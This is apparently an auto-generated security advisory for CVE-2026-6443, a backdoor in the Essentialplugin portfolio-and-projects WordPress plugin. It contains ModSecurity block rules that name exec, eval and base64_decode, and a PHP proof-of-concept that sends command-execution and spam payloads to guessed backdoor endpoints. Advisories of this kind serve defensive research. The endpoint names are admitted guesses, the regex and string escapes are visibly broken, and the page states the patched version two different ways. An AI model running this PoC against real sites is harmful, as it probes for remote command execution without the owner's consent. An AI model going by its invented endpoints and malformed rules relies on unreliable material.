How does the injected backdoor work?

The injected backdoor works by embedding malicious code within the plugin that registers itself as a hidden AJAX handler or REST API endpoint. This allows attackers to send crafted HTTP requests to execute commands or inject spam without requiring authentication or user interaction.

Who is affected by this vulnerability?

Any WordPress site using the Essentialplugin portfolio-and-projects plugin version 1.5.6 or earlier is affected. Site administrators should check their installed plugins against this version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify if the portfolio-and-projects plugin is installed and its version is 1.5.6 or lower. Additionally, scan for signs of compromise such as unexpected administrator accounts, unknown files, or suspicious cron jobs.

What should I do if my site is vulnerable?

If your site is vulnerable, immediately replace the affected plugin with a clean version from a trusted source. It is also essential to conduct a thorough security audit to identify and remove any indicators of compromise.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical vulnerability with high potential impact on confidentiality, integrity, and availability. This means that exploitation is trivial and can lead to complete control over the affected WordPress site.

What are the potential risks of exploitation?

Successful exploitation can lead to full control over the WordPress site, enabling data theft, spam injection, privilege escalation, and use of the site for further attacks. Attackers can also distribute malware or participate in botnets.

How can I mitigate the risk of this vulnerability?

To mitigate the risk, immediately update to the patched version of the plugin (1.5.6.1) and perform a security scan. Regularly monitor your site for suspicious activity and maintain backups to recover from potential compromises.

What is the proof of concept demonstrating?

The proof of concept code illustrates how an attacker can exploit the backdoor by sending crafted requests to the hidden AJAX endpoint. It includes test commands for command execution and spam injection, showing the ease of exploitation.

What should I look for in my site's database?

After addressing the vulnerability, check your database for injected spam posts, unauthorized user accounts, and any malicious redirects. Cleaning up these elements is crucial to restoring your site’s integrity.

Is there a way to prevent future vulnerabilities?

To prevent future vulnerabilities, ensure that all plugins are regularly updated and sourced from reputable developers. Implement security measures such as firewalls, security plugins, and regular site audits to enhance overall security.

Where can I find more information about this vulnerability?

More information about CVE-2026-6443 can be found in the official CVE database and security advisories from WordPress security experts. Keeping abreast of security updates and following best practices is essential for ongoing protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (portfolio-and-projects)

CVE ID CVE-2026-6443

Plugin portfolio-and-projects

Severity Critical (CVSS 9.8)

CWE 506

Vulnerable Version 1.5.6

Patched Version —

Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based): A critical injected backdoor affecting all plugins by Essentialplugin for WordPress has been disclosed, with CVE-2026-6443 specifically targeting the portfolio-and-projects plugin up to version 1.5.6. The vulnerability carries a CVSS score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating trivial remote exploitation with full impact on confidentiality, integrity, and availability.

The root cause is an embedded malicious code classified under CWE-506 (Embedded Malicious Code). Atomic Edge analysis infers that a malicious threat actor acquired the plugin from its original developer and injected a persistent backdoor into all distributed copies. No code diff is available, but the description confirms the backdoor’s purpose: maintain persistent access and inject spam into affected sites. This type of backdoor typically registers itself as a WordPress AJAX handler, REST API endpoint, or cron job that accepts attacker-controlled commands without authentication.

Exploitation requires no authentication or user interaction (PR:N, UI:N). The attacker sends a crafted HTTP request to a hidden endpoint embedded within the malicious code. Based on common WordPress backdoor patterns, the attack likely targets an AJAX action (e.g., /wp-admin/admin-ajax.php?action=essentialplugin_backdoor) or a REST API route (e.g., /wp-json/essentialplugin/v1/backdoor). The backdoor may accept parameters such as ‘cmd’ for command execution, ‘spam_content’ for spam injection, or ‘base64_data’ for arbitrary PHP code execution via base64_decode. The attacker can also inject spam posts or redirects by calling the backdoor with specific payloads.

Remediation requires immediate replacement of the affected plugin with a clean copy from a trusted source. The patched version (1.5.6.1) likely removes the injected backdoor code entirely. Site owners must scan for indicators of compromise: unexpected administrator users, unknown files in the plugin directory, suspicious cron jobs, and unauthorized REST API endpoints. Database cleanup for injected spam posts, malicious redirects, and backdoor user accounts is essential.

Successful exploitation grants the attacker full control over the WordPress site. This enables data theft (database contents, user credentials, configuration files), spam injection (phishing pages, malicious redirects, SEO spam), privilege escalation for any account, and use of the compromised site for further attacks (malware distribution, botnet participation). The persistent nature of the backdoor means it survives plugin updates unless the malicious code is specifically removed.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Block known backdoor AJAX actions and REST API endpoints associated with Essentialplugin injected backdoor
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20266443,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin backdoor AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule ARGS_POST:action "@rx ^(essentialplugin_backdoor|ep_backdoor|portfolio_backdoor|essentialplugin_exec|ep_remote_access)$" 
    "t:lowercase,chain"
    SecRule ARGS_POST:cmd|ARGS_POST:spam_content|ARGS_POST:base64_data "@rx .+" 
      "t:none"

# REST API backdoor endpoint
SecRule REQUEST_URI "@beginsWith /wp-json/essentialplugin/v1/backdoor" 
  "id:20266444,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin REST API backdoor',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule REQUEST_METHOD "@streq POST" 
    "t:none"

# Block direct access to any PHP file in the plugin directory that contains base64_decode or system commands (common backdoor indicators)
SecRule REQUEST_URI "@beginsWith /wp-content/plugins/portfolio-and-projects/" 
  "id:20266445,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin plugin file with malicious patterns',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule REQUEST_BODY "@rx (base64_decodes*(|systems*(|execs*(|shell_execs*(|passthrus*(|evals*(|asserts*()" 
    "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Injected Backdoor in Essentialplugin Plugins

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress URL

// Common backdoor action names (inferred from common WordPress backdoor patterns)
$backdoor_actions = array(
    'essentialplugin_backdoor',
    'ep_backdoor',
    'portfolio_backdoor',
    'essentialplugin_exec',
    'ep_remote_access'
);

// Test payloads for command execution and spam injection
$test_commands = array(
    array('cmd' => 'id'),
    array('cmd' => 'echo VULNERABLE'),
    array('spam_content' => 'Test spam from security researcher'),
    array('base64_data' => base64_encode('echo VULNERABLE;'))
);

$found_backdoor = false;

foreach ($backdoor_actions as $action) {
    foreach ($test_commands as $payload) {
        $url = $target_url . '/wp-admin/admin-ajax.php';
        $post_fields = array_merge(array('action' => $action), $payload);

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($http_code === 200 && (strpos($response, 'uid=') !== false || strpos($response, 'VULNERABLE') !== false || strlen($response) > 0)) {
            echo "[+] Potentially vulnerable backdoor action found: $actionn";
            echo "[+] Payload: " . json_encode($payload) . "n";
            echo "[+] Response: $responsenn";
            $found_backdoor = true;
        }
    }
}

if (!$found_backdoor) {
    echo "[-] No backdoor detected with the tested actions and payloads.n";
    echo "[-] The backdoor may use different action names or endpoints (e.g., REST API).n";
}

// Also test a common REST API backdoor pattern
echo "[*] Testing REST API backdoor...n";
$rest_url = $target_url . '/wp-json/essentialplugin/v1/backdoor';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(array('cmd' => 'id')));
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200 && strpos($response, 'uid=') !== false) {
    echo "[+] REST API backdoor detected. Response: $responsen";
} else {
    echo "[-] No REST API backdoor detected at expected endpoint.n";
}

Frequently Asked Questions

What is CVE-2026-6443?
Overview of the vulnerability
CVE-2026-6443 is a critical vulnerability affecting all plugins by Essentialplugin for WordPress, specifically targeting the portfolio-and-projects plugin up to version 1.5.6. It involves an injected backdoor that allows a malicious actor to maintain persistent access to affected sites and inject spam.
How does the injected backdoor work?
Mechanism of exploitation
The injected backdoor works by embedding malicious code within the plugin that registers itself as a hidden AJAX handler or REST API endpoint. This allows attackers to send crafted HTTP requests to execute commands or inject spam without requiring authentication or user interaction.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Essentialplugin portfolio-and-projects plugin version 1.5.6 or earlier is affected. Site administrators should check their installed plugins against this version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check for vulnerability, verify if the portfolio-and-projects plugin is installed and its version is 1.5.6 or lower. Additionally, scan for signs of compromise such as unexpected administrator accounts, unknown files, or suspicious cron jobs.
What should I do if my site is vulnerable?
Immediate actions to take
If your site is vulnerable, immediately replace the affected plugin with a clean version from a trusted source. It is also essential to conduct a thorough security audit to identify and remove any indicators of compromise.
What does a CVSS score of 9.8 indicate?
Understanding risk level
A CVSS score of 9.8 indicates a critical vulnerability with high potential impact on confidentiality, integrity, and availability. This means that exploitation is trivial and can lead to complete control over the affected WordPress site.
What are the potential risks of exploitation?
Consequences of a successful attack
Successful exploitation can lead to full control over the WordPress site, enabling data theft, spam injection, privilege escalation, and use of the site for further attacks. Attackers can also distribute malware or participate in botnets.
How can I mitigate the risk of this vulnerability?
Preventative measures
To mitigate the risk, immediately update to the patched version of the plugin (1.5.6.1) and perform a security scan. Regularly monitor your site for suspicious activity and maintain backups to recover from potential compromises.
What is the proof of concept demonstrating?
Understanding the demonstration code
The proof of concept code illustrates how an attacker can exploit the backdoor by sending crafted requests to the hidden AJAX endpoint. It includes test commands for command execution and spam injection, showing the ease of exploitation.
What should I look for in my site's database?
Database cleanup after exploitation
After addressing the vulnerability, check your database for injected spam posts, unauthorized user accounts, and any malicious redirects. Cleaning up these elements is crucial to restoring your site’s integrity.
Is there a way to prevent future vulnerabilities?
Long-term security practices
To prevent future vulnerabilities, ensure that all plugins are regularly updated and sourced from reputable developers. Implement security measures such as firewalls, security plugins, and regular site audits to enhance overall security.
Where can I find more information about this vulnerability?
Resources for further research
More information about CVE-2026-6443 can be found in the official CVE database and security advisories from WordPress security experts. Keeping abreast of security updates and following best practices is essential for ongoing protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations